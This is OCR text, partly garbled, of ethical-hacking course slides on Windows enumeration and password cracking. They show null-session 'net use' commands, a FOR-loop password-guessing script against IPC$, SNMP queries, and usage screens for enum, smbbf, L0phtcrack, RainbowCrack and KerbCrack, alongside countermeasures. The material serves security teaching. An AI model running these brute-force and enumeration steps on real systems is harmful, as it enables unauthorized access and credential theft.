permissions, policies, services, 
' and more using the Null user. 
The below syntax connects to the 
hidden Inter Process 
Communication 'share' (IPC$) at 
IP address 192.34.34.2 with the 
built-in anonymous user (/u:"") 
with ("") null password. 



C:\>net use \\192.34. 

BC-Council 



>eal? 



I 



The attacker now has a channel 
over which to attempt various 
techniques. 

The CIFS/SMB and NetBIOS 
standards in Windows 2000 
include APIs that return rich 
information about a machine via 
TCP port 139 - even to 
unauthenticated users. 



4.2 \IPC$ /u: 
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Tool: DumpSec 



DumpSec reveals shares over a null session with the target 
computer. 



^bSomarsofl: DumpSec (formerly DumpAcI) - \\192.168.2.1 10 i 



File Edit Search Report View Help 
I Policies 



Account Policies 



==>rc=5 NetUserModalsGet(B) 
==>rc=5 NetUserModalsGet(3) 

==>Not authorized to uieu remaining policy information 

Replication 

==>rc=5 OpenSCManager 

System Path Components (in search order) 

HKEV LOCAL MflCHINE\SVSTEM\CurrentControlSet\Seruices\LanmanSeruer\Parame1 
HKEV LOCAL MfiCHIHE\SVSTEM\CurrentControlSet\Control\SecurePipeSeruers (s( 
(key not present) 



_1} 

00001 ^ 
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NetBIOS Enumeration 



3] C:\WINNT\Sysl:em32\cmd.eKe 




Doing NET nane scan for addresses fron 192.168.2.0/24 




192.168.2.0 Sendto failed: Cannot assign requested address 

192.168.2.1 Recufron failed: Connection reset peer 




NetBIOS Nane Table for Host 192.168.2.4: 




^ane Service Type 




USER Uorkstation Service 

UORKGROUP Domain Nane 

JSER Messenger Service 




Adapter address: 00-0b-2b-0e-af-59 




NetBIOS Nane Table for Host 192.168.2.7: 




^ane Service Type 




JCIIRe2 Workstation Service 
RANGE2 Domain Nane 
JCIIRe2 Messenger Service 
JCIIR02 File Server Service 
RANGE2 Browser Service Elections 
RANGE2 Master Brouser 
OO MSBROUSE S Master Browser 




Adapter address: 00 80 ad 83 aS 2e 




NetBIOS Nane Table for Host 192.168.2.24: 




Name Service Type 




COMPUTREl Uorkstation Service 
GOMPUTHEl Messenger Service 




Adapter address: 00-cl-26-10-d4-2d 









'©N BTscan is a progrann for 
scanning I P networks for NetBI OS 
name information. 




I 



©For each responded host it lists I P 
address, NetBI OS computer name, 
logged- in user name, and MAC 
address. 



The first thing a remote attacker will try on a 
Windows 2000 network is to get list of 
hosts attached to the wire. 

1. net view / domain 
2. nbstat -A <some IP> 
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h 



© It's a powerful connect- based TCP port scanner, pinger, and 
hostname resolver. 

© 1 1 performs pi ng scans and port scans usi ng any I P range or 
by specify! ng a text fi le to extract addresses from. 

© Scan any port range from a built-in list or specified range. 

© Resolve and reverse- lookup any I P address or range. 

© Modifies the port list and port descriptions by using the 
built-in editor. 

© 1 1 connects to any discovered open port usi ng user- specified 
"helper" applications (e.g. Telnet, Web browser, FTP) and 
assigns a custom helper application to any port. 



Tool: SuperScan4 
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Snapshot for SuperScan 



Scan I Hast and Serviice DkcQvery ] ScanCptionsj Tools | Windows Enumeralnn | .Abcut 



IP^ 



HoslnaiirWIP jwiwtv.Gartifiedliackiei.cDnn 
End IP 2<jr^ 

Read IPs rrom fie i> 



US 165 126 I 
129 . 165 136~ ^ I 



Stat IP 



End IP 



Cleir SeleclBd 



Oeafil 



Live hoiti tliis biJtcti: 1 

Z0Z.123.1S5.1Z6 

HosTMiame: ITJiLknovm.) 
TCP r.'OVt? (iS; 

gA^£5, £3,30, ai^es, 110, 112, 229, 44-3, &Jg,XO£C, 103?, 3-^^6^3306, 337?, 33^5, S3S3 
UUP poifts Caj £3,L23,iei 



P 4 ST tovm-i 'hftiu-ipi: ^ail^f . . . 

TCP b.3LrirLCi' cfroibing C19 pDffcsJ 
UI>f banner grEiLb±n.g C3 p^ctf } 

Hep^jftlng scan resules 

Scan done 



Dis«v*¥V sem tinifbad; Ot/^t/Oi ilrSSiSt 





H 


II 


YTewHTMLResUts | 





W;44 ISaved log We 



Live: 
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Snapshot for Windows Enumeration 



-i SuperScan 4.0 



Scan ) Host and Service Discovery 1 Scan Options ] Tools Windows Enumeration | About | 
Hostname/IP/URL |www.certifiedhacker.conn 



Stop I Options... I Clear | 



(✓1 



Enumeration Type 



0 NetBIOS Name Table 
0 NULL Session 
0 MAC Addresses 
171 Workstation type 
0 Users 
0 Groups 

0RPCEndpointDump 

0 Account Policies 

0 Shares 

0 Domains 

0 Remote Time of Day 

0 Logon Sessions 

0 Drives 

0 Trusted Domains 
0 Services 
0 Registry 



Enumeration complete 

NetBIOS information on ZOZ . 1Z9 . 16E . 1Z6 



Attempting a HULL session connection on Z0Z.1Z9.16S.1Z6 



HAC addresses on Z0Z.1Z9.16S.1Z6 



Uorkst at ion/ server type on Z0Z.1Z9.16S.1Z6 



Users on ZOZ . 129 . 16E . 1Z6 



Groups on ZOZ . 1Z9 . 16S . 1Z6 



RPC endpoints on ZOZ . 1Z9 . 16S . 1Z6 



Password and account policies on ZOZ . 1Z9 . 16S . 1Z6 



p0;44 5aved log file 



|Llve; 1 |tcp open; 18 |UDP open; 3 |l/l done 



/a 
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iSelectD;\WINNT\systefn3Z\cm(l.eKe 


1 M 


X 


C:S)enun 






usage: enun [suitcliesl [liostnanelipl 






-y: get userlist 






-N: get nachine list 






-N: get nanelist dump (different fron -Ul-M) 






-S: get share list 






-P: get password policy infornation 






-G: get group and nenber list 






-L: get LSfl policji infornation 






-D: dictionari; crack, needs -u and -f 






-d: be detailed, applies to -I) and -S 






-c: don't cancel sessions 






specify usernane to use (default "") 






-p: specify password to use (default "") 






-f: specify dictfile to use (wants -D) 






C:S). 







Tool: Enum 



I 



©Avail able for download from 
http://razor.bindview.com. 

© en u m i s a consol e- based Win32 
information enumeration utility. 

©Using null sessions, enum can 
retri eve user I i sts, mach i ne I i sts, 
share lists, name lists, group and 
membership lists, password and LSA 
policy information. 

©enum is also capable of 
rudimentary brute force dictionary 
attack on individual accounts. 
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Enumerati ng User Accounts 



© Two powerful NT/2000 enumeration tools are: 

• Isid2user 

• 2.user2sid 

© They can be downloaded at (www.chenn.nnsu.su/ ^rudnyi/ NT/) 

© These are connnnand line tools that look up NT SI Dsfronn user 
nanne i nput and vi ce versa 



^ ^ C:\WINNT\System32\cmd.eKe 




-|n| 


'^1 








3 


D:\Module 4 - Enurieration\sid>user2sid \\196.^^| 


^1 adninistrator 






S-1 -5-21-1123561945-1788223648-725345543-500 








Nunber of subauthorities is 5 
Donain is ETRUSTFIREUfiLL 
Length of SID in nenorv is 28 b^tes 
Type of SID is SidTypeUser 
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Tool : GetAcct 



I 



© GetAcct sidesteps "Restrict Anonynnous=l" and acquires 
account information on Windows NT/ 2000 machines. 

© Down loadable from (www.securityfriday.com). 



f } GetAcct 



File View Help 



,_Jnj2<j 



Remote Computer 
192. 16S. Z. 162 



End of RID 



lOSO 



Get Account 



1 I 



Domain/ Computer Name 



FUTURE 
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Null Session Counter measure 



I 



©Null sessions require access to TCP B9 and/ or TCP 445 
ports. 

©Null session does not work with Windows 2003. 

© You could al so disableSMB services entirely on individual 
hosts by unbi ndi ng Wl N S CI i ent TCP/ 1 P from the 
i nterf ace. 

© Edit the registry to restrict the anonymous user. 

• 1 Open regedt32, navigate to 

H KL M \ SYSTE M \ CurrentControl Set\ LSA 

• 2. Choose edit | add value 

• value nanne: Restrict Anonymous 

• Data Type: REG_WORD 

• Value: 2 
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SNMP Enumeration 



© SN M P is si mple. M anagers send requests to agents, and 
the agents send back repi i es. 

©The requests and repI i es refer to vari abl es accessi bl e to 
agent software. 

© M anagers can also send requests to set values for 
certain variables. 

© Traps let the manager know that something significant 
has happened at the agent's end of thi ngs: 

• a reboot 

• an interface failure, 

• or that sometliing else that is potentially bad has happened. 

© E numerati ng NT users vi a SN M P protocol i s easy usi ng 
snmputil. 
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Management I nformation Base 



© M I B provides a standard representation of the SN |V| P 
agent's available information and where it is stored. 

© M I B is the most basic element of network management. 

© MIB-II istheupdated version of the standard Ml B. 

© MIB-II adds new SYNTAX types, and adds more 
manageable objects to the M I B tree. 
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SNMPutil Example 



H C:\WINNT\System32\cmd.eKe 



C:\>snnputil get 210.212.69.129 public 

Uariable = systen.sysObjectID.0 

Ualue = ObjectID 1.3.6.1.4.1.9.1.27 



.1.3.6.1.2.1.1.2.0 



C:S>snnputil getnext 210.212.69.129 public interfaces . if Number .0 
Uariable = interfaces . if Table . if Entry. if Index. 1 
Ualue = Integer32 1 



I 



C:S>snnputil getnext 210.212.69.129 public interfaces . if Table . if Entry. if Index. 1 
Uariable = interfaces . if Table . if Entry. if Index. 2 
Ualue = Integer32 2 



C:N>snnputil getnext 210.212.69.129 public interfaces . if Table . if Entry. if Index. 2 
Uariable = interfaces . if Table . if Entry. if Index. 3 
Ualue = Integer32 3 



C:\>snnputil getnext 210.212.69.129 public 0.0 
Uariable = systen.sysDescr .0 

Ualue = String <0x43><0x69><0x73><0x63><0x6f ><0x20><0x49><0x6e><0x74><0x65><0 
x72 ><0x6e ><0x65 ><0x74><0x77><0x6f ><0x72 ><0x6b><0x20><0x4f >< 0x70 >< 0x6 S >< 0x72 ><0x6 
l><0x74><0x69><0x6e><0x67><0x20><0xS3><0x79><0x73><0x74><0x65><0x6d><0x20><0x53> 
<0x6f><0x66><0x74><0x77><0x61><0x72><0x6S><0x20><0x0d><0x0a><0x49><0x4f><0x53><0 
X20><0x28><0x74><0x6d><0x29><0x20><0x32><0x35><0x30><0x30><0x20><0x53><0x6f><0x6 
6><0x74><0x77><0x61><0x72><0x65><0x20><0x28><0x43><0x32><0x35><0x30><0x30><0x2d> 
<0x49><0x2d><0x4c><0x29><0x2c><0x20><0x56><0x65><0x72><0x73><0x69><0x6f><0x6e><0 
X20><0x31><0x31><0x2e><0x32><0x28><0x31><0x30><0x61><0x29><0x2c><0x20><0x52><0x4 
5 ><0x4c ><0x45 ><0x41 ><0x53 ><0x45 ><0x20><0x53 ><0x4f ><0x46 X 0x5 4X0x5 7X0x41 X0x52 > 
<0x45><0x20><0x28X0x66><0x63><0x31><0x29><0x0dX0x0a><0x43><0x6f><0x70><0x79X0 
x72><0x69><0x67X0x68X0x74X0x20><0x28><0x63X0x29X0x20X0x31><0x39><0x38X0x3 
6><0x2d><0x31><0x39><0x39X0x37><0x20><0x62><0x79><0x20><0x63><0x69><0x73><0x63> 
<0x6f><0x20><0x53><0x79><0x73><0x74><0x65><0x6d><0x73><0x2c><0x20><0x49><0x6e><0 
x63><0x2e><0x0d><0x0a><0x43X0x6f><0x6d><0x70><0x69><0x6cX0x65><0x64><0x20><0x5 
4><0x75><0x65><0x20><0x30X0x32><0x2d><0x44><0x65><0x63><0x2d><0x39><0x37><0x20> 
<0x31><0x36><0x3a><0x30><0x32><0x20><0x62><0x79><0x20><0x63><0x6b><0x72><0x61><0 
x6cX0x69X0x6b> 
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Tool :Solarwinds 



© 1 1 is a set of network 
management tools. 

© The tool set consists 
of the foil owing: 

Discovery 

Cisco Tools 

Ping Tools 

Address 
M anagement 

Monitoring 

MIB Browser 

Security 

Miscellaneous 



rij MAC ftddrcss Discovery 



I y # ^ f 

I Export Print Settings Help 

Local Subnel |l9Z1G8.1.0 ^ Discovei MAC Addiesses 



, lou^winDyns; 

hiBtworli Managemerii Toals 



i 



IP Address MAC Address DNS " 



Network Card ManufactLirer 



1 92 .1 63.1 .23 030D .7530.35C3 home-3oxi55tiweb 

1 92 .1 6S.1 .21 OOOB .2B00.ABFD ECCINDIADMN 

192.163.1.25 636B.2B11.6979 T 



Discovery 



^<^^^ fl^\f<i?*^-r ^iy^<b^^ 

^^^4' <M^' <M^ <M^^ 



A- 



<M^' 4€/ <M^^ 




(C^ 



<^:^t\^V o::^:v^V o^Iv^V 



..1^ 



vO 



I MAC Address Discovery Complete. 3 addresses. 
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Tool : SNScanVlOS 



I © 1 1 i s a Wi ndows- base^ 
SN M P scanner that can \ 
effectively detect SN M P- 
enabled devices on tlie 
networl<. 

© 1 1 scans specific SN |V| P 
ports and uses public and 
user defined SNMP 
community names. 

© 1 1 is handy as a tool for 
information gathering. J 



S SMScan 1.05 - Copyright @ Foundstone Inc. - http://www.roundstane.c 



n|x| 



-IP addresses to scan- 



Hostname/IP |l 32.1 68.1. 21 



Start IP )<j I 192 . 168 . 
End IP Xj I 192 . 168 . 



1 . 22 



1 . 25 



J 



Read IPs from file Browse... 



Start IP 



End IP 



Clear Selected 



192.168.1.21 
192.1 68.1. 2f 



192.1681.25 



Clear All 



— SNMP ports to scan — 
F 161 r 199 

r 162 r 391 

r 193 r 1993 



-SNMP communitv string- 



f* Just try this one name | public 
C Multiple names from list Browse... 



I Port I Name | Description" 
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Source: http://www.foundstone.com 



Scan control 

F Randomize scan order 
Timeout (ms] | 2100 



Scanned: 5/5 



Save... 
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SNMP Enumeration Countermeasures 



! 

© Si mplest way to prevent such activity is to remove the 
SN |V| P agent or turn off the SN |V| P servi ce. 

© If shutting off SNjVlP is not an option, then change the 
default "public" community name. 

© Implement the Group Policy security option called 
"Additional restrictions for anonymous connections." 

© Access to null session pi pes and null session shares, and 
I PSec fi Itering should also be restricted. 
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Tool: Winfingerprint 



©Winfingerprint is GUI - 
based. 

©It has the option of 
scanni ng a si ngle host or 
a continuous network 
blocl<. 

© H as two mai n 
windows: 

• I P address range 

• Windows options 



\ Winfingerprint 0.5.10 



Input Options 

^ ^ IP List 

single Host Neighborhood 
Starting IP Address; 



Pl9Z 


. 163 . 170 


1 


Ending 


IP Address; 




1 192 


, 168 , 170 


1 



|~ Wetmcisk 



- Network Type- 
<• NT Domain 



^ Active Directory ^ WMI 



-Scan Options 

\7 Win32 OS Version R Users ^ Registry 

|~ Null IPC$ Sessions p" Services j— nbt 

Information 

\7 NetBIOS Shares V Disks ^ Sessions 
\7 Date and Time f^' Groups Event Log 



Errors 



-General Options 



Timeout for TCP/UDP/ICMP/SNMP 
Retries: fs 



Source: http:// wi nf i ngerpri nt.sourceforge.net 



clear 



Help 



]l, Intel 8255x-based Integrated Fast Ethernet (Micnjso_J p -^^p portscan Range: fl 

fi P UDP Portscan Range; 

|— SNMP Community String; 
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ft 

■ 



© All theexlstlng users and groups could be enumerated with a 

I sinnpleLDAP query. 

I 

© Wi ndows Server 2003's AD is largely identical to its predecessor 
and thus can be accessed by LDAP query tools. 

© Theonlything required to perform this enunneration is to create 

1 an authenti cated sessi on vi a L DAP . 

© Connect to any AD server using Idp.exeport 389. 

© Authenticateyourself using Guest /pr any domain account. 

© Now all the users and built-in groups could beenumerated. 
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AD Enumeration counter measures 



I 



© H ow i s thi s possi bl e wi th a si mpl e guest account? 

© The Win 2l<dcpronno installations screen prompts if the 
user wants to relax access permissi ons on the di rectory 
to al low legacy servers to perform lookup: 

LPermission compatible with pre-Win2k. 

2. Permission compatible with only with Win2k. 

© Choose option 2 during AD installation. 
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steps to Perform Enumeration 



1 Extract user names using win 2k enumeration. 

2. Gather information from the host using null 
sessions. 

3. Perform windows enumeration using the tool 
Super Scan4. 

4. Get the users accounts usi ng the tool GetAcct. 

5. Perform SN M P port scan usi ng the tool 
SNScanVLOS. 
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© Enumeration involves active connections to systems 
and directed queries. 

© Tlietypeof information enumerated by intruders 
includes network resources and shares, users and 
groups, and applications and banners. 

©Null sessions are used often by crackers to connect to 
target systems. 

© NetBIOS and SNMP enumerations can be disguised 
using tools such assnmputil, nat, etc. 

© Tools such as user2sid, sid2user, and userinfo can be 
used to identify vulnerable user accounts. 
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Ethical Hacking 



ModuleV 
System H acki ng 



Module Objective 



© U nderstandi ng password cracki ng 

© U nderstandi ng password attacks 

© I dentifyi ng various password cracki ng tools 

© Formulati ng counter measures for password 
cracki ng 

© E seal ati ng pr i vi I eges 

© U nderstandi ng keyloggers and otiier spyware 

© Hidingfiles 

© U nderstandi ng rootkits 

© The use of Steganography 

© Coveri ng tracks 
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Module Flow 



■— ^^^^^ 

■ Tools for Password Attacks ^ 



Password Cracki ng 
Counter measures 
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Password Sniffing 



■► Escalation of Privileges — i 
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Scenario 



© 



© 



© 



David works in the University Examination cell. 
Recently, he has been approached by a group of 
students who would I ike him to leak out the 
examination papers in exchange for money. 
Only David's boss, Daniel, has access to the 
Question Bank. David is tempted by the offer, 
so he accepts. H ow do you thi nk wi 1 1 David 
proceed in his actions? 

Do you think that David will beableto hijack 
Daniel's account to leak information? 

What prel i mi nary study wi 1 1 Davi d do before 
starting the actual action? 

Can Daniel beheld responsible in case David 
succeeds in his evil design? 
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System Hacking: 
Part 



Cracki ng passwords 



CEH Hacking Cycle 




Enumeration 



Cracki ng passwords 



Escalating privileges -i 
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Password Types 



I 



© Passwords that contai n only letters. 

• HIJKLMNO 

© Passwords that contai n only numbers. 

• 758904 

© Passwords that contai n only special characters. 

• $(§)$!() 

© Passwords that contai n letters and nunnbers. 

• axlSOOg 

© Passwords that contai n only letters and special 
characters. 

• m(g)roon$ 

© Passwords that contai n only special characters and 
nunnbers. 

• (a)$47$ 

© Passwords that contai n letters, special characters, and 
nunnbers. 

• Eln(a)8$ 
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CHC: Cracking passwords 



Types of Password Attack 



I 



Four types of 
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Passive Online- Wire Sniffing 



© Access and record raw network traffic 
© Wait until authentication sequence 
© Brute force credentials 
© Considerations 

• Relatively hard to perpetrate 

• Usually extremely computationally complex 

• Tools widely aval I able 
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Passive Onl i ne Attacks 



Man-in-the-Middleand Replay Attacks 

© Somehow get access to communi cati ons channel 

© Wait until authentication sequence 

© Proxy authentication- traffic 

© No need to brute- force 

© Considerations 

• Rel ati vel y hard to perpetrate 

• M ust be trusted by one or both si des 

• Some tool s wi del y aval I abl e 

• Can someti mes be broken by 1 nval 1 dati ng traff 1 c 
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ActiveOnline- Password Guessing 



© Try different passwords until oneworl<s 
© Succeeds wit in... 

• Bad passwords 

• Open authentication points 

© Considerations 

• Should take a longtime 

• Requires huge amounts of network bandwidth 

• Easily detected 

• Core problem: Bad passwords 
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Off I i ne Attacks 



© Time consuming 

© LIV| Hashes much more vulnerable due to smaller key space 
and shorter length 

© Web servi ces aval I abl e 

© Distributed password cracking techniques available 
© Mitigations 

• U se good passwords 

• Remove LM Hashes 

• Attacker has password database 

© Password representations must be cryptograph i cal I y secure 
© Considerations 

• Moore's law 
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Offline Attacks 



Dictionary Attack 

© Try different passwords 
from a list 

© Succeeds only with poor 
passwords 

© Considerations 

• Very fast 

• Core problem: Bad 
passwords 



Hybrid Attack 

© start with Dictionary 
© I nsert entropy 

• Append a symbol 
mm* Append a number 

© Considerations 

Relatively fast 

Succeeds when entropy 
poorly used 



IS 
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Off I i ne Attacks 



Brute- force Attack 
© Try al I possi ble passwords 

• M ore commonly, a subset thereof 

© Usually implemented with progressive complexity 
© Typically, LM "hash" is attacked first 
© Considerations 

• Very slow 

• All passwords wi 1 1 eventually be found 

• Attack against NT hash is M UGH harder than LM hash 
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Offline Attacks 



Pre-computed Hashes 

© Generate all possible hashes 
© Compare to database val ues 
© Storing hashes requires huge storage 

• LM "Hashes": 310 Terabytes 

• NTH ashes < 15 chars: 5,652,897,009 exabytes 

©Solution: Use a time- space tradeoff 
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Non-Technical Attacks 



© Shoulder surfing 

^ • Watchi ng sonneone type thei r password 

Connnnon and successful 
Bi • Mouthing password while typing 

© Keyboard sniffing 

^ • H ardware i s cheap and hard to detect 

• Software i s cheap and hard to detect 
pr • Both can be control I ed rennotel y 

© Social engineering 

• Discussed in Module 9 
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Password Mitigation 



U se the f ol I owi ng i n pi ace of passwords: 
© Smart cards 

• Two- factor authentication 

• Very difficult to thwart 

• H igh cost of initial deployment 

© Biometric 

• Two- or three- factor authentication 

• Usually defeated with non-technical attacks 

• Very expensive 

• Failure-prone 
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Permanent Account Lockout - 
E mpl oyee P r i vi I ege Abuse 



Termination Notice 


Employee Name: 


Employee ID: 




E m pi oyee Address: 


Employee SSN: 




Manager Name: 


Manager ID: 




Department: 






Termination Effective Date: 






Benefits Continuation: 


□ Yes Severance Package: 

□ No 


□ Yes 

□ No 


1 cTiTll naiion rvoaSOn. 


u upcning unsoiiciDca ^maii 

□ Sending spam 

□ Emanating Viruses 

□ Port scanning 

□ Attempted unauthorized access 

□ Surfing porn 

□ 1 nstal ling shareware 

□ Possessi on of hacki ng tool s 


u KcTusai vo aDiae oy secuniy policy 

□ Sending unsolicited e-mail 

□ Allowing kids to use company 
computer to do homework 

Disabling virus scanner 

La Running P2P file sharing 

□ Unauthorized file/web serving 

□ Annoying the Sysadmin 
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Administrator Password Guessing 



© AssumingthatNetBIOSTCPBQportis 
open, the most effective method of 
breaking into NT/ 2000 is password 
guessing. 

© Attempti ng to connect to an enumerated 
share (ipc$, or c$) and trying user 
namo^ password. 

© Default admin$, c$, %systemdrive% 
shares are good starti ng poi nt. 



sX>* sXi' 
^^^^^^^^^ ^^^^^^ 
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CHC: Cracking passwords 



i 



Manual Password Cracking Algorithm 



©Find a valid user 

©Create a I i st of possi bl e passwords 

©Ranl<the passwords from high probability to low 

© Key i n each password 

© I f the system al I ows i n - Success, or el se try agai n 



Ujohn/dfdfg 



peter./34dre45 




< 



1 < 



1 < 



Rudy/98#rt 



Jacob/nukk 



System 



Manual Attacker 
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Automatic Password Cracking Algorithm 



©Find a valid user 

©Find encryption algorithnn used 

©Obtain encrypted passwords 

©Create I i st of possi bl e passwords 

©Encrypt each word 

©See if there is a nnatch for each user I D 

©Repeat steps 1 through 6 




Ujohn/dfdfg 



Rudy/98#rt 



peter./34dre45 



Jacob/nukk 



System 



Attack Speed 300 words/ sec 




Password 
Cracker 



^^^^^^ 
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CHC: Cracking passwords 



Performi ng Automated Password 
Guessing 



©Performing automated password guessing is easy— simple loop using the 
NT/ 2000 shell for command based on the standard NET USE syntax. 

1 Create a si mple user name and password fi le. 

2. Pipethisfile into FOR command: 

C:\> FOR /F "token=l, 2^" 
( credent ials . txt ) 

do net use \\target\IPC$ %i /u: 




""^ti'sernanie password 

password administrator 

xycdf john ' 

babe_me y rebecca 

freak_you / Rumsfield 
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Tool: NAT 



I 



I ©The NetBIOS Auditing Tool (NAT) is designed to explore the 
N etB I OS f i I e-shari ng servi ces offered by the target system. 

• it implements a stepwise approach to gather information and 
attempt to obtai n f i I e system- 1 evel access as though i t were a 
I egi ti mate I ocal cl i ent . 

©If a NETBIOS session can be established at all via TCP port 
B9, the target is declared "vulnerable. 

©Once the session isfully set up, transactions are performed to 
collect more information about the server, including any file 
system "shares" it offers. 
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NAT Screenshot 



^ C:\WINMT\systenfi32\cmd.eHe - nat -u userlist.tHt -p passlist.tHt 10.0.0.6 ^^^^^^^9 



[«] Obtaining list of remote NetBIOS names 

[«] Remote systems name tables: 

SVSTEMIVOGI 
SVSTEMIVOGI 
SOURCE HOMING 
SOURCE HOMING 
SOURCE HOMING 
INet~Seruices 
Got 1 

Got 2 

_MSBROUSE_Got 2 

IS~SVSTEM1V0GI 

[*] Attempting to connect uith name: * 

[«] Unable to connect 

[«] Attempting to connect uith name: SVSTEMIVOGI 

[«] CONNECTED with name: SVSTEMIVOGI 

[«] Attempting to connect uith protocol: MICROSOFT NETWORKS 1.03 

[«] Server time is Thu Apr 28 05:36:42 2005 

[«] Timesone is UTC-7.0 

.[«] Remote seruer uants us to encrypt, telling it not to 



BC-Council 



CHC: Cracking passwords 



Copyright © byBC-Council 
All Rights reserved. Reproduction is strictly prohibited 



smbbf (SM B Passive Brute Force Tool) 



SMB - Bruteforcer Ul.0.4 by (patrik.karlssonPixsecurity.con) 

usage: smbbf -i [options] 

-i* IP address of server to bruteforce 

-p Path to file containing passwords 

-u Path to file containing users 

-s Seryer to bruteforce 

-r Path to report file 

-t timeout for connect (default 300ms> 

-u Uorkgroup/Domain 

-g Be nice, automatical^ detect account lockouts 

-y Be yerbose 

-P Protocol version 

0 - Netbios Mode 

1 - Uindous 2000 Native Mode 
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Hacking Tool: LOphtcrack 



JOstake LC4 - [Untitled2] 



File View Import Session Help 



I 1^ ^ 



*) I A I n El * I ^ II I »• IB SB I IS" I 



User Name 



Administrator 
J^S aschmidt 
J^cwysopal 

^ Guest 

j^S mgavin 

^^rcheyne 



I Livi Password 



I <S I NTLM Password | LM Hash 



NTLM Hash 



02A55B1C2530A543AAD3B435B51404EE 
E52CAC67419A9A224A3B10SF3FA6CB6D 
E52CAC67419A9A224A3B108F3FA6CB6D 
E5ZCAC67419A9AZZ4A3B108F3FA6CB6D 
315B02FDD7121D6FAAD3B435B51404EE 



Auditing Options For This Session 



2ii 



■ Dictionary Crack- 
le EnaWed 



Dictionary List | 



The Dictionary Crack tests for passwords that are the same as the words listed in the 
word file. This test is very fast and finds the weakest passwords. 



■ Dictionary/Brute Hybrid Crack 

P Enabled pj T] Characters to prepend 



[2 Characters to append 



~ Comnnon letter substitutions (much slower] 

The Dictionary/Brute Hybrid Crack tests i^or passwords that are variations of the words in 
the word file. It finds passwords such as "Dana99" or "monkeys!". This test is fast and 
finds weak passwords. 



< I 



■ Brute Force Crack- 
Enabled 
\7 Distributed 
Part r' Of f 



Character Set: 

|A-Z, 0-9and!(att$K'-K:-()-_ 



Custonr^ Cl^aracter Set [list eacl^ character): 



6DElFA182Bt; 
SS4SF7EAEES 
8846F7EAEEg 
BB46F7EAEEe 
D1CD4A7740I 
8846F7EAEEE 
1B62018F0DC 



oil^^_tot.a 1 
0 

0 



O . 000% 



BRUTE FORCE 



Od Oh Om 03 
jtj.me_J.eft. 



'^_^C)n^ 

_ cur rent _t est 
k^vr ^t.e 



_ tot.al_useiis 



3 1 

.^udj.t^ed_useiis 



I Lfeaf Info ChBGk 

I Diclionary 

I hlytwid 

I flfUle Force 

Stake 



I. II 



LC4 is a password auditing and recovery pacl<age distributed 
SM B pacl<et capture I istens to the local network segment and 
login sessions. 



by ©stake software, 
captures individual 
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M icrosoft Authentication 



©NTLM (NT LAN Manager) is a challenge/ response 
form of authentication that was the default network 
authentication protocol in Windows NT 4.0/ 
Wi ndows 2000 

©M icrosoft has upgraded its default authentication 
protocol to Kerberos, a considerably more secure 
option than NTLM V . 
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LM,NTLMvl and NTLMv2 



Attribute 


LM 


NTLMvl 


NTLMv2 


Password case sensitive 


No 


Yes 


Yes 


Hash l<ey lengtli 


56bit+56bit 


- 


- 


Password inasii algoritlim 


DES(ECB mode) 


MD4 


MD4 


Hasli value lengtli 


64bit+64bit 


I28bit 


128bit 


C/R l<ey lengtli 


56bit + 56bit + 
16bit 


56bit + 56bit + 
16bit 


128bit 


C/R algoritlim 


DES(ECB mode) 


DES (ECB mode) 


HMAC MD 
5 


C/R value lengtli 


64bit + 64bit + 
64bit 


64bit + 64bit + 
64bit 


128bit 
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What is LAN Manager Hash? 



Example: Let's say that the password is: 123456qwerty 

© When this password is encrypted with LM algorithnn, it is first converted 
to all uppercase: 1234560WERTY 

© The password is padded with null (blank) characters to nnakeit 14 
character length: 1234560WERTY_ 

© Before encrypting this password, 14 character string is split into half: 
123456Q and WERTY_ 

© Each string is individually encrypted and the results concatenated. 

© 123456Q=6BF11E04AFAB197F 

WERTY_ =F1E9FFDCC75575B15 

© The hash is6BFllE04AFAB197FFlE9FFDCC75575B15 



Note : The first half of the hash contains alphanunneric characters and it will 
take 24 hrs to crack by LOphtcrack and the second half only takes 60 
seconds. 
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LM Hash 



I 



16byteLM hash 



lebyteNTLM hash (md4) 



]st8bytesof LM hash 



from fi rst 7chars 



2nd Sbytesof LM hash 



from second 7 chars 



© The f i rst 8 bytes are der i ved f ronn the f i rst 7 characters of the 
password and the second 8 bytes are derived from the characters 8 
through 14 of the password 



© I f the password is less than 7 characters, then the second half wi 
always be 0xAAD3B435B51404EE 

© Let's assume, for this example, that the user's password has an LM 
hash of 0xC234BA8AlE7665f AAD3B435B51404EE 

© LC4 wi 1 1 crack the password as "WE LCOM E " 
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PWdump2 and Pwdump3 



Command Prompt 




©pwdump2 decrypts a password or password file. It uses an 
algorithmic approach as well as brute forcing. 

©pwdumpB is a Windows NT/ 2000 remote password hash 
grabber. Usage of this program requires administrative privileges 
on the remote system. 
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L i 



Tool: Rainbowcrack 



© H ash cracker 

© Pre-computes al I possi ble plai ntext - ci phertext 
pai rs i n advance and stores them i n the f i I e cal I ed 
"rainbow table" 



G : SCEH \H a j aST o o Is Sra in bo uc rac k >rc rac k 

RainbouCrack 1.2 - Making a Faster Crypt an a lytic Time -Memory Trade -Off 
by Zhu Shuanglei <shuanglei(?hotiT)ail.coiT)> 
ht t p : //uuu . an t s ight . com/ss 1/rainboucrack/ 

usage : rcrack rainboiJ_table_pathname -h hash 

rcrack rainbow_table_pathnaiie -1 hash_list_f ile 

rcrack rainboiJ_table_pathnaiie -f pijduiip_file 

rainbow_table_pathname : pathname of the rainbow table <s>, ijildchar<*, ?> supported 

-h hash: use raw hash as input 

-1 hash_list_f ile : use hash list file as input, each hash in a line 

-f pwdump_file: use pwdump file as input, this will handle lanmanager hash only 

example: rcrack ».rt -h 5d4i402abc4b2a76b9719d91i017c592 
rcrack ».rt -1 hash.txt 
rcrack *.rt -f hash.txt 
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Hacking Tool: KerbCrack 



©KerbCrack consists of two programs, kerbsniff and 
kerbcrack. The sniffer listens on the network and captures 
Wi ndows 2000/ XP Kerberos logi ns. The cracker can be used 
to find the passwords from the capture file using a brute force 
attack or a di cti onary attack. 

3' 



F^C:\WIINMT\5Ysl:em32\cmd.eHe ^_^^^HI3 

Microsoft Uindous 2000 [Uersion 5.00.2195] 
<C> Copyright 1985-2000 Microsoft Corp. 

C : S >ke r be r ac k 

KerbCrack 1.2 - <c> 2002, flrne Uidstron 

- http : //ntsecur ity . nu/too Ibox/kerbcrack/ 

Usage: kerbcrack <capture file> <crack mode> [dictionarv file] [passuord size] 

crack modes: 

-bl = brute force attack uith <a-z, fl-Z> 

-b2 = brute force attack uith <a-s, fl-Z, 0-9 > 

-b3 = brute force attack uith <a-2, fl-Z, 0-9, special characters > 
-b4 = bl + suedish letters 
-b5 = b2 + suedish letters 
-b6 = b3 + suedish letters 

-d = dictionarv attack uith specified dictionarv file 
